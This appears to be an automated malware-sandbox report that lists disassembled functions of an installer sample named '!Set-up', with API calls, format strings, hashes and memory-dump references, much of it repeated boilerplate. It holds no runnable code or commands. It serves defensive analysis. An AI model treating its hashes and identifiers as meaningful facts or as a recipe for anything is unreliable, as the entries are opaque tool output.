                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                              • String ID: verifying installer: %d%%
                                                              • API String ID: 1451636040-82062127
                                                              • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                              • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                              • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                              • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                              Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                              • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                              • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                              • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: Char$Next$Prev
                                                              • String ID: *?|<>/":
                                                              • API String ID: 589700163-165019052
                                                              • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                              • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                              • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                              • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                              Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                              • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                              • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: Close$DeleteEnumOpen
                                                              • String ID:
                                                              • API String ID: 1912718029-0
                                                              • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                              • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                              • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                              • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                              Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?), ref: 004020A3
                                                              • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                              • DeleteObject.GDI32(00000000), ref: 004020EE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                              • String ID:
                                                              • API String ID: 1849352358-0
                                                              • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                              • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                              • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                              • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                              Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Timeout
                                                              • String ID: !
                                                              • API String ID: 1777923405-2657877971
                                                              • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                              • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                              • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                              • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                              Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                              • wsprintfW.USER32 ref: 00404483
                                                              • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: ItemTextlstrlenwsprintf
                                                              • String ID: %u.%u%s%s
                                                              • API String ID: 3540041739-3551169577
                                                              • Opcode ID: 58b15896a84fc5e7a6d3d9a22e8d585b885ca92bf9a6589a07360a0de3a23a39
                                                              • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                              • Opcode Fuzzy Hash: 58b15896a84fc5e7a6d3d9a22e8d585b885ca92bf9a6589a07360a0de3a23a39
                                                              • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                              Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                              • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                              Strings
                                                              • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                              • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                              • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                              • API String ID: 1697273262-1764544995
                                                              • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                              • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                              • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                              • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                              Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                              • lstrlenW.KERNEL32 ref: 004026B4
                                                              • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                              • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                              • String ID: CopyFiles "%s"->"%s"
                                                              • API String ID: 2577523808-3778932970
                                                              • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                              • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                              • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                              • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                              Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: lstrcatwsprintf
                                                              • String ID: %02x%c$...
                                                              • API String ID: 3065427908-1057055748
                                                              • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                              • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                              • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                              • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                              Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OleInitialize.OLE32(00000000), ref: 00405083
                                                                • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                              • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                              • String ID: Section: "%s"$Skipping section: "%s"
                                                              • API String ID: 2266616436-4211696005
                                                              • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                              • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                              • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                              • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                              Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDC.USER32(?), ref: 00402100
                                                              • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427976,759223A0,00000000), ref: 00406902
                                                              • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
